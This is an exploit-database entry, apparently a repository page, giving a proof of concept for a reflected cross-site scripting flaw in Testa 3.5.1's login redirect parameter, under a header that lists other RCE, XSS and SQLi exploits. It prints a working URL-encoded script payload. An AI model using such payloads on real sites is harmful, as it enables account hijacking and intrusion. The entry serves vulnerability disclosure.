c5397147d9
7 changes to exploits/shellcodes Teleport v10.1.1 - Remote Code Execution (RCE) TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated) Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS) Aero CMS v0.0.1 - SQLi Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
20 lines
No EOL
686 B
Text
20 lines
No EOL
686 B
Text
# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
|
|
# Date: 28/08/2022
|
|
# Exploit Author: Ashkan Moghaddas
|
|
# Vendor Homepage: https://testa.cc
|
|
# Software Link:
|
|
https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip
|
|
# Version: 3.5.1
|
|
# Tested on: Windows/Linux
|
|
|
|
# Proof of Concept:
|
|
# 1- Install Testa 3.5.1
|
|
# 2- Go to https://localhost.com/login.php?redirect=XXXX
|
|
# 3- Add payload to the Tab, the XSS Payload:
|
|
%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
|
|
# 4- XSS has been triggered.
|
|
|
|
# Go to this url "
|
|
https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
|
|
"
|
|
XSS will trigger. |